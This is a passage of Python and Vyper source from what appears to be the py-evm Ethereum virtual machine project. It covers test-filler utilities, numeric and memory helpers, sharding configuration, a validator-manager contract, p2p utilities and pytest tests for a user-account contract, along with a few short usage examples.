add_transaction_to_group,
calc_state_root,
compile_vyper_lll,
get_test_name,
get_version_from_git,
deep_merge,
wrap_in_list,
)
from .formatters import (
filled_state_test_formatter,
filled_vm_test_formatter,
)
#
# Defaults
#
DEFAULT_MAIN_ENVIRONMENT = {
"currentCoinbase": to_canonical_address("0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba"),
"currentDifficulty": 131072,
"currentGasLimit": 1000000,
"currentNumber": 1,
"currentTimestamp": 1000,
"previousHash": decode_hex(
"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6"
),
}
DEFAULT_SHARDING_ENVIRONMENT = {
"shardID": 0,
"expectedPeriodNumber": 0,
"periodStartHash": decode_hex(
"0x148067ef259ce711201e6b2a8438b907d0ac0549deef577aff58f1b9143a134a"
),
"currentCoinbase": to_canonical_address("0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba"),
"currentNumber": 1,
"previousHash": decode_hex(
"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6"
),
}
DEFAULT_MAIN_TRANSACTION = {
"data": b"",
"gasLimit": 100000,
"gasPrice": 0,
"nonce": 0,
"secretKey": decode_hex("0x45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8"),
"to": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"value": 0
}
DEFAULT_SHARDING_TRANSACTION = {
"chainID": 0,
"shardID": 0,
"to": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"data": b"",
"gasLimit": 100000,
"gasPrice": 0,
"accessList": [],
"code": b"",
}
def get_default_transaction(networks):
if "Sharding" not in networks:
return DEFAULT_MAIN_TRANSACTION
else:
return DEFAULT_SHARDING_TRANSACTION
DEFAULT_EXECUTION = {
"address": to_canonical_address("0x0f572e5295c57f15886f9b263e2f6d2d6c7b5ec6"),
"origin": to_canonical_address("0xcd1722f2947def4cf144679da39c4c32bdc35681"),
"caller": to_canonical_address("0xcd1722f2947def4cf144679da39c4c32bdc35681"),
"value": 1000000000000000000,
"data": b"",
"gasPrice": 1,
"gas": 100000
}
ALL_NETWORKS = [
"Frontier",
"Homestead",
"EIP150",
"EIP158",
"Byzantium",
"Sharding",
]
ACCOUNT_STATE_DB_CLASSES = {
"Frontier": MainAccountStateDB,
"Homestead": MainAccountStateDB,
"EIP150": MainAccountStateDB,
"EIP158": MainAccountStateDB,
"Byzantium": MainAccountStateDB,
"Sharding": ShardingAccountStateDB,
}
assert all(network in ACCOUNT_STATE_DB_CLASSES for network in ALL_NETWORKS)
FILLED_WITH_TEMPLATE = "py-evm-{version}"
Test = namedtuple("Test", ["filler", "fill_kwargs"])
Test.__new__.__defaults__ = (None,) # make `None` default for fill_kwargs
#
# Filler Generation
#
def setup_filler(name, environment=None):
environment = normalize_environment(environment or {})
return {name: {
"env": environment,
"pre": {},
}}
def setup_main_filler(name, environment=None):
return setup_filler(name, merge(DEFAULT_MAIN_ENVIRONMENT, environment or {}))
def setup_sharding_filler(name, environment=None):
return setup_filler(name, merge(DEFAULT_SHARDING_ENVIRONMENT, environment or {}))
@curry
def pre_state(pre_state, filler):
test_name = get_test_name(filler)
old_pre_state = filler[test_name].get("pre_state", {})
pre_state = normalize_state(pre_state)
defaults = {address: {
"balance": 0,
"nonce": 0,
"code": b"",
"storage": {},
} for address in pre_state}
new_pre_state = deep_merge(defaults, old_pre_state, pre_state)
return assoc_in(filler, [test_name, "pre"], new_pre_state)
def _expect(post_state, networks, transaction, filler):
test_name = get_test_name(filler)
test = filler[test_name]
test_update = {test_name: {}}
pre_state = test.get("pre", {})
post_state = normalize_state(post_state or {})
defaults = {address: {
"balance": 0,
"nonce": 0,
"code": b"",
"storage": {},
} for address in post_state}
result = deep_merge(defaults, pre_state, normalize_state(post_state))
new_expect = {"result": result}
if transaction is not None:
transaction = normalize_transaction(
merge(get_default_transaction(networks), transaction)
)
if "transaction" not in test:
transaction_group = apply_formatters_to_dict({
"data": wrap_in_list,
"gasLimit": wrap_in_list,
"value": wrap_in_list,
}, transaction)
indexes = {
index_key: 0
for transaction_key, index_key in [
("gasLimit", "gas"),
("value", "value"),
("data", "data"),
]
if transaction_key in transaction_group
}
else:
transaction_group, indexes = add_transaction_to_group(
test["transaction"], transaction
)
new_expect = assoc(new_expect, "indexes", indexes)
test_update = assoc_in(test_update, [test_name, "transaction"], transaction_group)
if networks is not None:
networks = normalize_networks(networks)
new_expect = assoc(new_expect, "networks", networks)
existing_expects = test.get("expect", [])
expect = existing_expects + [new_expect]
test_update = assoc_in(test_update, [test_name, "expect"], expect)
return deep_merge(filler, test_update)
def expect(post_state=None, networks=None, transaction=None):
return partial(_expect, post_state, networks, transaction)
@curry
def execution(execution, filler):
execution = normalize_execution(execution or {})
    # use caller as origin if not explicitly given
if "caller" in execution and "origin" not in execution:
execution = assoc(execution, "origin", execution["caller"])
if "vyperLLLCode" in execution:
code = compile_vyper_lll(execution["vyperLLLCode"])
if "code" in execution:
if code != execution["code"]:
raise ValueError("Compiled Vyper LLL code does not match")
execution = assoc(execution, "code", code)
execution = merge(DEFAULT_EXECUTION, execution)
test_name = get_test_name(filler)
return deep_merge(
filler,
{
test_name: {
"exec": execution,
}
}
)
#
# Test Filling
#
def fill_test(filler, info=None, apply_formatter=True, **kwargs):
test_name = get_test_name(filler)
test = filler[test_name]
if "transaction" in test:
filled = fill_state_test(filler, **kwargs)
formatter = filled_state_test_formatter
elif "exec" in test:
filled = fill_vm_test(filler, **kwargs)
formatter = filled_vm_test_formatter
else:
raise ValueError("Given filler does not appear to be for VM or state test")
info = merge(
{"filledwith": FILLED_WITH_TEMPLATE.format(version=get_version_from_git())},
info if info else {}
)
filled = assoc_in(filled, [test_name, "_info"], info)
if apply_formatter:
return formatter(filled)
else:
return filled
def fill_state_test(filler):
test_name = get_test_name(filler)
test = filler[test_name]
environment = normalize_environment(test["env"])
pre_state = normalize_state(test["pre"])
transaction_group = normalize_transaction_group(test["transaction"])
post = defaultdict(list)
for expect in test["expect"]:
indexes = expect["indexes"]
networks = normalize_networks(expect["networks"])
result = normalize_state(expect["result"])
post_state = deep_merge(pre_state, result)
for network in networks:
account_state_db_class = ACCOUNT_STATE_DB_CLASSES[network]
post_state_root = calc_state_root(post_state, account_state_db_class)
post[network].append({
"hash": encode_hex(post_state_root),
"indexes": indexes,
})
return {
test_name: {
"env": environment,
"pre": pre_state,
"transaction": transaction_group,
"post": post
}
}
def fill_vm_test(
filler,
*,
call_creates=None,
gas_price=None,
gas_remaining=0,
logs=None,
output=b""
):
test_name = get_test_name(filler)
test = filler[test_name]
environment = normalize_environment(test["env"])
pre_state = normalize_state(test["pre"])
execution = normalize_execution(test["exec"])
assert len(test["expect"]) == 1
expect = test["expect"][0]
assert "network" not in test
assert "indexes" not in test
result = normalize_state(expect["result"])
post_state = deep_merge(pre_state, result)
call_creates = normalize_call_creates(call_creates or [])
gas_remaining = normalize_int(gas_remaining)
output = normalize_bytes(output)
logs = normalize_logs(logs or [])
log_hash = hash_log_entries(logs)
return {
test_name: {
"env": environment,
"pre": pre_state,
"exec": execution,
"post": post_state,
"callcreates": call_creates,
"gas": gas_remaining,
"output": output,
"logs": log_hash,
}
}
```
#### File: evm/utils/numeric.py
```python
import functools
import itertools
import math
from cytoolz import (
pipe,
)
from evm.constants import (
UINT_255_MAX,
UINT_256_MAX,
UINT_256_CEILING,
)
from evm.utils.padding import (
pad32,
)
def int_to_big_endian(value):
byte_length = math.ceil(value.bit_length() / 8)
return (value).to_bytes(byte_length, byteorder='big')
def big_endian_to_int(value):
return int.from_bytes(value, byteorder='big')
def int_to_byte(value):
return bytes([value])
def int_to_bytes32(value):
if not isinstance(value, int) or isinstance(value, bool):
raise ValueError(
"Value must be an integer: Got: {0}".format(
type(value),
)
)
if value < 0:
raise ValueError(
"Value cannot be negative: Got: {0}".format(
value,
)
)
if value > UINT_256_MAX:
raise ValueError(
"Value exeeds maximum UINT256 size. Got: {0}".format(
value,
)
)
value_bytes = pipe(
value,
int_to_big_endian,
pad32,
)
return value_bytes
byte_to_int = ord
def ceilXX(value, ceiling):
remainder = value % ceiling
if remainder == 0:
return value
else:
return value + ceiling - remainder
ceil32 = functools.partial(ceilXX, ceiling=32)
ceil8 = functools.partial(ceilXX, ceiling=8)
def unsigned_to_signed(value):
if value <= UINT_255_MAX:
return value
else:
return value - UINT_256_CEILING
def signed_to_unsigned(value):
if value < 0:
return value + UINT_256_CEILING
else:
return value
def safe_ord(value):
if isinstance(value, int):
return value
else:
return ord(value)
def is_even(value):
return value % 2 == 0
def is_odd(value):
return value % 2 == 1
def get_highest_bit_index(value):
value >>= 1
for bit_length in itertools.count():
if not value:
return bit_length
value >>= 1
```
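
A few sanity checks of the numeric helpers above, shown as an illustrative sketch (the expected values follow directly from the definitions; run with the functions of this module in scope):
```python
# Illustrative expectations for the helpers defined above.
assert int_to_big_endian(0x1234) == b'\x12\x34'
assert big_endian_to_int(b'\x12\x34') == 0x1234
assert ceil32(1) == 32 and ceil32(32) == 32 and ceil32(33) == 64
assert ceil8(9) == 16
# get_highest_bit_index returns the zero-based index of the most significant
# set bit, i.e. value.bit_length() - 1 for positive integers.
assert get_highest_bit_index(1) == 0
assert get_highest_bit_index(8) == 3
assert get_highest_bit_index(255) == 7
```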
#### File: forks/homestead/vm_state.py
```python
from evm.vm.forks.frontier.vm_state import FrontierVMState
from .blocks import HomesteadBlock
from .computation import HomesteadComputation
from .validation import validate_homestead_transaction
class HomesteadVMState(FrontierVMState):
block_class = HomesteadBlock
computation_class = HomesteadComputation
def validate_transaction(self, transaction):
validate_homestead_transaction(self, transaction)
```
#### File: forks/sharding/config.py
```python
from eth_utils import (
to_wei,
)
from evm.utils import (
env,
)
def get_sharding_config():
return {
        # TODO: currently fixed at 100 ETH; should be removed after
# variable-sized deposit is implemented
'DEPOSIT_SIZE': env.get(
'PYEVM_SHARDING_DEPOSIT_SIZE',
type=int,
default=to_wei('100', 'ether'),
),
        # the maximum number of periods ahead of the current period for which `get_eligible_proposer` can be called
'LOOKAHEAD_PERIODS': env.get('PYEVM_SHARDING_LOOKAHEAD_PERIODS', type=int, default=4),
# the number of blocks in one `period`
'PERIOD_LENGTH': env.get('PYEVM_SHARDING_PERIOD_LENGTH', type=int, default=5),
# the gas limit of one collation
'COLLATION_GASLIMIT': env.get(
'PYEVM_SHARDING_COLLATION_GASLIMIT',
type=int,
default=10 ** 7,
),
# the number of shards
'SHARD_COUNT': env.get('PYEVM_SHARDING_SHARD_COUNT', type=int, default=100),
# the gas limit of verifying a signature
'SIG_GASLIMIT': env.get('PYEVM_SHARDING_SIG_GASLIMIT', type=int, default=40000),
# the reward for creating a collation
'COLLATOR_REWARD': env.get(
'PYEVM_SHARDING_COLLATOR_REWARD',
type=int,
default=to_wei('0.001', 'ether'),
),
# default gas_price
'GAS_PRICE': env.get('PYEVM_SHARDING_GAS_PRICE', type=int, default=1),
# default gas, just a large enough gas for vmc transactions
'DEFAULT_GAS': env.get('PYEVM_SHARDING_DEFAULT_GAS', type=int, default=510000),
}
```
#### File: sharding/contracts/validator_manager.v.py
```python
CollationAdded: __log__({
shard_id: indexed(num),
expected_period_number: num,
period_start_prevhash: bytes32,
parent_hash: bytes32,
transaction_root: bytes32,
collation_coinbase: address,
state_root: bytes32,
receipt_root: bytes32,
collation_number: num,
is_new_head: bool,
score: num,
})
# TODO: determine the signature of the log `Deposit` and `Withdraw`
Deposit: __log__({validator_index: num, validator_addr: address, deposit: wei_value})
Withdraw: __log__({validator_index: num, validator_addr: address, deposit: wei_value})
# Information about validators
validators: public({
# Amount of wei the validator holds
deposit: wei_value,
# Address of the validator
addr: address,
}[num])
# Number of validators
num_validators: public(num)
# Collation headers
collation_headers: public({
parent_hash: bytes32,
score: num,
}[bytes32][num])
# Receipt data
receipts: public({
shard_id: num,
tx_startgas: num,
tx_gasprice: num,
value: wei_value,
sender: address,
to: address,
data: bytes <= 4096,
}[num])
# Current head of each shard
shard_head: public(bytes32[num])
# Number of receipts
num_receipts: num
# Indexes of empty slots caused by the function `withdraw`
empty_slots_stack: num[num]
# The top index of the stack in empty_slots_stack
empty_slots_stack_top: num
# Has the validator deposited before?
is_validator_deposited: public(bool[address])
# Log the latest period number of the shard
period_head: public(num[num])
# Configuration Parameter
# The exact deposit size which you have to deposit to become a validator
deposit_size: wei_value
# Number of blocks in one period
period_length: num
# Number of shards
shard_count: num
# Number of periods ahead of the current period for which the contract
# is able to return the collator
lookahead_periods: num
@public
def __init__():
self.num_validators = 0
self.empty_slots_stack_top = 0
# 10 ** 20 wei = 100 ETH
self.deposit_size = 100000000000000000000
self.period_length = 5
self.shard_count = 100
self.lookahead_periods = 4
# Checks if empty_slots_stack is empty
@internal
def is_stack_empty() -> bool:
return (self.empty_slots_stack_top == 0)
# Pushes one num to empty_slots_stack
@internal
def stack_push(index: num):
self.empty_slots_stack[self.empty_slots_stack_top] = index
self.empty_slots_stack_top += 1
# Pops one num out of empty_slots_stack
@internal
def stack_pop() -> num:
if self.is_stack_empty():
return -1
self.empty_slots_stack_top -= 1
return self.empty_slots_stack[self.empty_slots_stack_top]
# Returns the current maximum index for validators mapping
@internal
def get_validators_max_index() -> num:
zero_addr = 0x0000000000000000000000000000000000000000
activate_validator_num = 0
all_validator_slots_num = self.num_validators + self.empty_slots_stack_top
# TODO: any better way to iterate the mapping?
for i in range(1024):
if i >= all_validator_slots_num:
break
if self.validators[i].addr != zero_addr:
activate_validator_num += 1
return activate_validator_num + self.empty_slots_stack_top
# Adds a validator to the validator set, with the validator's size being the msg.value
# (ie. amount of ETH deposited) in the function call. Returns the validator index.
@public
@payable
def deposit() -> num:
validator_addr = msg.sender
assert not self.is_validator_deposited[validator_addr]
assert msg.value == self.deposit_size
# find the empty slot index in validators set
if not self.is_stack_empty():
index = self.stack_pop()
else:
index = self.num_validators
self.validators[index] = {
deposit: msg.value,
addr: validator_addr,
}
self.num_validators += 1
self.is_validator_deposited[validator_addr] = True
log.Deposit(index, validator_addr, msg.value)
return index
# Verifies that `msg.sender == validators[validator_index].addr`. If it is, removes the validator
# from the validator set and refunds the deposited ETH.
@public
@payable
def withdraw(validator_index: num) -> bool:
validator_addr = self.validators[validator_index].addr
validator_deposit = self.validators[validator_index].deposit
assert msg.sender == validator_addr
self.is_validator_deposited[validator_addr] = False
self.validators[validator_index] = {
deposit: 0,
addr: None,
}
self.stack_push(validator_index)
self.num_validators -= 1
send(validator_addr, validator_deposit)
log.Withdraw(validator_index, validator_addr, validator_deposit)
return True
# Uses a block hash as a seed to pseudorandomly select a signer from the validator set.
# [TODO] Chance of being selected should be proportional to the validator's deposit.
# Should be able to return a value for the current period or any future period up to `lookahead_periods` periods ahead.
@public
@constant
def get_eligible_proposer(shard_id: num, period: num) -> address:
assert period >= self.lookahead_periods
assert (period - self.lookahead_periods) * self.period_length < block.number
assert self.num_validators > 0
return self.validators[
as_num128(
num256_mod(
as_num256(
sha3(
concat(
# TODO: should check further if this can be further optimized or not
# e.g. be able to get the proposer of one period earlier
blockhash((period - self.lookahead_periods) * self.period_length),
as_bytes32(shard_id),
)
)
),
as_num256(self.get_validators_max_index()),
)
)
].addr
# Attempts to process a collation header, returns True on success, reverts on failure.
@public
def add_header(
shard_id: num,
expected_period_number: num,
period_start_prevhash: bytes32,
parent_hash: bytes32,
transaction_root: bytes32,
collation_coinbase: address, # TODO: cannot be named `coinbase` since it is reserved
state_root: bytes32,
receipt_root: bytes32,
collation_number: num) -> bool: # TODO: cannot be named `number` since it is reserved
zero_addr = 0x0000000000000000000000000000000000000000
# Check if the header is valid
assert (shard_id >= 0) and (shard_id < self.shard_count)
assert block.number >= self.period_length
assert expected_period_number == floor(decimal(block.number / self.period_length))
assert period_start_prevhash == blockhash(expected_period_number * self.period_length - 1)
# Check if this header already exists
header_bytes = concat(
as_bytes32(shard_id),
as_bytes32(expected_period_number),
period_start_prevhash,
parent_hash,
transaction_root,
as_bytes32(collation_coinbase),
state_root,
receipt_root,
as_bytes32(collation_number),
)
entire_header_hash = sha3(header_bytes)
assert self.collation_headers[shard_id][entire_header_hash].score == 0
# Check whether the parent exists.
# if (parent_hash == 0), i.e., is the genesis,
# then there is no need to check.
if parent_hash != as_bytes32(0):
assert self.collation_headers[shard_id][parent_hash].score > 0
    # Check that there is only one collation per period per shard
assert self.period_head[shard_id] < expected_period_number
# Check the signature with validation_code_addr
validator_addr = self.get_eligible_proposer(shard_id, block.number / self.period_length)
assert validator_addr != zero_addr
assert msg.sender == validator_addr
# Check score == collation_number
_score = self.collation_headers[shard_id][parent_hash].score + 1
assert collation_number == _score
# Add the header
self.collation_headers[shard_id][entire_header_hash] = {
parent_hash: parent_hash,
score: _score,
}
# Update the latest period number
self.period_head[shard_id] = expected_period_number
# Determine the head
is_new_head = False
if _score > self.collation_headers[shard_id][self.shard_head[shard_id]].score:
self.shard_head[shard_id] = entire_header_hash
is_new_head = True
# Emit log
log.CollationAdded(
shard_id,
expected_period_number,
period_start_prevhash,
parent_hash,
transaction_root,
collation_coinbase,
state_root,
receipt_root,
collation_number,
is_new_head,
_score,
)
return True
# Returns the gas limit that collations can currently have (by default make
# this function always answer 10 million).
@public
@constant
def get_collation_gas_limit() -> num:
return 10000000
# Records a request to deposit msg.value ETH to address to in shard shard_id
# during a future collation. Saves a `receipt ID` for this request,
# also saving `msg.sender`, `msg.value`, `to`, `shard_id`, `startgas`,
# `gasprice`, and `data`.
@public
@payable
def tx_to_shard(
to: address,
shard_id: num,
tx_startgas: num,
tx_gasprice: num,
data: bytes <= 4096) -> num:
self.receipts[self.num_receipts] = {
shard_id: shard_id,
tx_startgas: tx_startgas,
tx_gasprice: tx_gasprice,
value: msg.value,
sender: msg.sender,
to: to,
data: data,
}
receipt_id = self.num_receipts
self.num_receipts += 1
# TODO: determine the signature of the log TxToShard
raw_log(
[
sha3("tx_to_shard(address,num,num,num,bytes4096)"),
as_bytes32(to),
as_bytes32(shard_id),
],
concat('', as_bytes32(receipt_id)),
)
return receipt_id
# Updates the tx_gasprice in receipt receipt_id, and returns True on success.
@public
@payable
def update_gasprice(receipt_id: num, tx_gasprice: num) -> bool:
assert self.receipts[receipt_id].sender == msg.sender
self.receipts[receipt_id].tx_gasprice = tx_gasprice
return True
```
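
The proposer selection in `get_eligible_proposer` above reduces to hashing a past block hash together with the shard id and taking the result modulo the validator-slot count. Below is a hypothetical off-chain sketch of the same arithmetic in Python (function name and parameters are illustrative, not part of py-evm):
```python
from eth_utils import big_endian_to_int, keccak


def eligible_proposer_index(period_seed_block_hash, shard_id, validators_max_index):
    # Mirrors sha3(concat(blockhash(...), as_bytes32(shard_id))) % max_index
    # from the Vyper contract above; purely illustrative.
    digest = keccak(period_seed_block_hash + shard_id.to_bytes(32, 'big'))
    return big_endian_to_int(digest) % validators_max_index


# Example: pick a slot index for shard 3 out of 10 validator slots.
index = eligible_proposer_index(b'\xab' * 32, 3, 10)
assert 0 <= index < 10
```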
#### File: evm/vm/memory.py
```python
import itertools
import logging
from evm.validation import (
validate_is_bytes,
validate_length,
validate_lte,
validate_uint256,
)
from evm.utils.numeric import (
ceil32,
)
class Memory(object):
"""
VM Memory
"""
bytes = None
logger = logging.getLogger('evm.vm.memory.Memory')
def __init__(self):
self.bytes = bytearray()
def extend(self, start_position, size):
if size == 0:
return
new_size = ceil32(start_position + size)
if new_size <= len(self):
return
size_to_extend = new_size - len(self)
self.bytes.extend(itertools.repeat(0, size_to_extend))
def __len__(self):
return len(self.bytes)
def write(self, start_position, size, value):
"""
Write `value` into memory.
"""
if size:
validate_uint256(start_position)
validate_uint256(size)
validate_is_bytes(value)
validate_length(value, length=size)
validate_lte(start_position + size, maximum=len(self))
if len(self.bytes) < start_position + size:
self.bytes.extend(itertools.repeat(
0,
                    (start_position + size) - len(self.bytes),
))
for idx, v in enumerate(value):
self.bytes[start_position + idx] = v
def read(self, start_position, size):
"""
Read a value from memory.
"""
return bytes(self.bytes[start_position:start_position + size])
```
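
A short usage sketch for the `Memory` class above (assumes py-evm's validation helpers are importable); note that `write` requires the target region to have been extended first:
```python
memory = Memory()
memory.extend(0, 4)                      # grows to the next 32-byte boundary
assert len(memory) == 32
memory.write(0, 4, b'\xde\xad\xbe\xef')  # region must already fit, see validate_lte above
assert memory.read(0, 4) == b'\xde\xad\xbe\xef'
assert memory.read(4, 2) == b'\x00\x00'  # untouched bytes stay zeroed
```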
#### File: py-evm/p2p/sedes.py
```python
from rlp import sedes
class HashOrNumber:
def serialize(self, obj):
if isinstance(obj, int):
return sedes.big_endian_int.serialize(obj)
return sedes.binary.serialize(obj)
def deserialize(self, serial):
if len(serial) == 32:
return sedes.binary.deserialize(serial)
return sedes.big_endian_int.deserialize(serial)
```
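
A hedged example of how the sedes above behaves (assuming the `rlp` package is installed): integers go through `big_endian_int`, while 32-byte values are treated as hashes and passed through `binary` unchanged.
```python
sedes_obj = HashOrNumber()

# Block numbers round-trip through rlp's big-endian-int encoding.
assert sedes_obj.deserialize(sedes_obj.serialize(1234)) == 1234

# 32-byte values are treated as hashes and returned as raw bytes.
block_hash = b'\x11' * 32
assert sedes_obj.deserialize(sedes_obj.serialize(block_hash)) == block_hash
```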
#### File: py-evm/p2p/utils.py
```python
import os
import rlp
from evm.utils.numeric import big_endian_to_int
def sxor(s1: bytes, s2: bytes) -> bytes:
if len(s1) != len(s2):
raise ValueError("Cannot sxor strings of different length")
return bytes(x ^ y for x, y in zip(s1, s2))
def roundup_16(x):
"""Rounds up the given value to the next multiple of 16."""
remainder = x % 16
if remainder != 0:
x += 16 - remainder
return x
def gen_request_id():
return big_endian_to_int(os.urandom(8))
def get_devp2p_cmd_id(msg: bytes) -> int:
"""Return the cmd_id for the given devp2p msg.
The cmd_id, also known as the payload type, is always the first entry of the RLP, interpreted
as an integer.
"""
return rlp.decode(msg[:1], sedes=rlp.sedes.big_endian_int)
def safe_ord(value):
if isinstance(value, int):
return value
else:
return ord(value)
```
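
Quick illustrative checks for the pure helpers above (values follow from the definitions; assumes the module's own imports resolve):
```python
assert sxor(b'\x0f\x0f', b'\xf0\xf0') == b'\xff\xff'
assert roundup_16(0) == 0 and roundup_16(5) == 16 and roundup_16(16) == 16
assert safe_ord('A') == 65 and safe_ord(65) == 65
assert 0 <= gen_request_id() < 2 ** 64  # request ids are 8 random bytes
```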
#### File: auxiliary/user-account/test_contract.py
```python
import pytest
from eth_keys import keys
from trie import (
BinaryTrie,
)
from cytoolz import (
merge,
dissoc,
assoc,
)
from evm.constants import (
UINT_256_MAX,
SECPK1_N,
ZERO_HASH32,
ENTRY_POINT,
EMPTY_SHA3,
)
from evm.vm.message import (
ShardingMessage,
)
from evm.vm.forks.sharding import (
ShardingVM,
)
from evm.vm.forks.sharding.transaction_context import (
ShardingTransactionContext,
)
from evm.vm.forks.sharding.transactions import (
ShardingTransaction,
)
from evm.rlp.headers import (
CollationHeader,
)
from evm.db import (
get_db_backend,
)
from evm.db.chain import (
ChainDB,
)
from evm.db.state import (
ShardingAccountStateDB,
)
from eth_utils import (
keccak,
to_canonical_address,
int_to_big_endian,
big_endian_to_int,
decode_hex,
)
from evm.utils.padding import (
pad32,
zpad_left,
)
from evm.utils.address import (
generate_CREATE2_contract_address,
)
from evm.auxiliary.user_account_contract.transaction import (
UserAccountTransaction,
UnsignedUserAccountTransaction,
)
from evm.auxiliary.user_account_contract.contract import (
generate_account_bytecode,
NONCE_GETTER_ID,
ECRECOVER_ADDRESS as ECRECOVER_ADDRESS_INT,
)
PRIVATE_KEY = keys.PrivateKey(b"\x33" * 32)
ACCOUNT_CODE = generate_account_bytecode(PRIVATE_KEY.public_key.to_canonical_address())
ACCOUNT_ADDRESS = generate_CREATE2_contract_address(b"", ACCOUNT_CODE)
INITIAL_BALANCE = 10000000000
# contract that does nothing
NOOP_CONTRACT_CODE = b""
NOOP_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", NOOP_CONTRACT_CODE)
# contract that reverts without returning data
FAILING_CONTRACT_CODE = b"\x61\x00\x00\xfd" # PUSH2 0 0 REVERT
FAILING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", FAILING_CONTRACT_CODE)
# contract that logs available gas
# GAS PUSH1 0 MSTORE PUSH1 32 PUSH1 0 LOG0
GAS_LOGGING_CONTRACT_CODE = b"\x5a\x60\x00\x52\x60\x20\x60\x00\xa0"
GAS_LOGGING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", GAS_LOGGING_CONTRACT_CODE)
# contract that logs hash of passed data
# CALLDATASIZE PUSH1 0 PUSH1 0 CALLDATACOPY CALLDATASIZE PUSH1 0 SHA3 PUSH1 0 MSTORE PUSH1 32
# PUSH1 0 LOG0
DATA_LOGGING_CONTRACT_CODE = (
b"\x36\x60\x00\x60\x00\x37\x36\x60\x00\x20\x60\x00\x52\x60\x20\x60\x00\xa0"
)
DATA_LOGGING_CONTRACT_ADDRESS = generate_CREATE2_contract_address(b"", DATA_LOGGING_CONTRACT_CODE)
HELPER_CONTRACTS = {
ACCOUNT_ADDRESS: ACCOUNT_CODE,
NOOP_CONTRACT_ADDRESS: NOOP_CONTRACT_CODE,
FAILING_CONTRACT_ADDRESS: FAILING_CONTRACT_CODE,
GAS_LOGGING_CONTRACT_ADDRESS: GAS_LOGGING_CONTRACT_CODE,
DATA_LOGGING_CONTRACT_ADDRESS: DATA_LOGGING_CONTRACT_CODE,
}
DESTINATION_ADDRESS = b"\xbb" * 20
ECRECOVER_ADDRESS = zpad_left(int_to_big_endian(ECRECOVER_ADDRESS_INT), 20)
DEFAULT_BASE_TX_PARAMS = {
"chain_id": 1,
"shard_id": 1,
"to": ACCOUNT_ADDRESS,
"gas": 500000,
"access_list": [
[ACCOUNT_ADDRESS, b"\x00" * 32],
[ECRECOVER_ADDRESS],
],
"code": b"",
"salt": b"\x00" * 32,
}
DEFAULT_TX_PARAMS = merge(
dissoc(DEFAULT_BASE_TX_PARAMS, "code", "salt"),
{
"destination": DESTINATION_ADDRESS,
"value": 0,
"min_block": 0,
"max_block": UINT_256_MAX,
"nonce": 0,
"msg_data": b"",
"access_list": DEFAULT_BASE_TX_PARAMS["access_list"] + [
[DESTINATION_ADDRESS],
],
"gas_price": 0,
}
)
SIGNED_DEFAULT_TRANSACTION = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 0,
})).as_signed_transaction(PRIVATE_KEY)
DEFAULT_V = SIGNED_DEFAULT_TRANSACTION.v
DEFAULT_R = SIGNED_DEFAULT_TRANSACTION.r
DEFAULT_S = SIGNED_DEFAULT_TRANSACTION.s
@pytest.fixture
def vm():
header = CollationHeader(
shard_id=0,
expected_period_number=2,
period_start_prevhash=decode_hex(
"3c4cc7b99c7eb9281e9a8d15cd4b2f98c5df085e929f15388c699b41cdde78d7"
),
parent_hash=ZERO_HASH32,
transaction_root=EMPTY_SHA3,
coinbase=to_canonical_address("8888f1f195afa192cfee860698584c030f4c9db1"),
state_root=EMPTY_SHA3,
receipt_root=EMPTY_SHA3,
number=10,
)
chaindb = ChainDB(
get_db_backend(),
account_state_class=ShardingAccountStateDB,
trie_class=BinaryTrie,
)
vm = ShardingVM(header=header, chaindb=chaindb)
vm_state = vm.state
with vm_state.state_db() as statedb:
for address, code in HELPER_CONTRACTS.items():
statedb.set_code(address, code)
statedb.set_balance(ACCOUNT_ADDRESS, INITIAL_BALANCE)
# Update state_root manually
vm.block.header.state_root = vm_state.state_root
return vm
def get_nonce(vm):
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
return big_endian_to_int(computation.output)
def test_get_nonce(vm):
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
assert computation.output == pad32(b"\x00")
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
computation, _ = vm.apply_transaction(ShardingTransaction(**merge(DEFAULT_BASE_TX_PARAMS, {
"data": int_to_big_endian(NONCE_GETTER_ID),
})))
assert computation.output == pad32(b"\x01")
def test_call_increments_nonce(vm):
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_success
assert get_nonce(vm) == 1
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 1,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_success
assert get_nonce(vm) == 2
def test_call_checks_nonce(vm):
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_success
computation, _ = vm.apply_transaction(SIGNED_DEFAULT_TRANSACTION)
assert computation.is_error
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": 2,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
assert computation.is_error
@pytest.mark.parametrize("min_block,max_block,valid", [
(min_block, max_block, True) for min_block, max_block in [
(0, UINT_256_MAX),
(0, 10),
(10, 10),
(10, UINT_256_MAX)
]] + [
(min_block, max_block, False) for min_block, max_block in [
(0, 9),
(5, 9),
(11, 20),
(11, UINT_256_MAX),
(11, 9),
(UINT_256_MAX, 0),
]]
)
def test_call_checks_block_range(vm, min_block, max_block, valid):
assert vm.block.number == 10
transaction = UnsignedUserAccountTransaction(**merge(DEFAULT_TX_PARAMS, {
"nonce": get_nonce(vm),
"min_block": min_block,
"max_block": max_block,
})).as_signed_transaction(PRIVATE_KEY)
computation, _ = vm.apply_transaction(transaction)
if valid:
assert computation.is_success
else:
assert computation.is_error
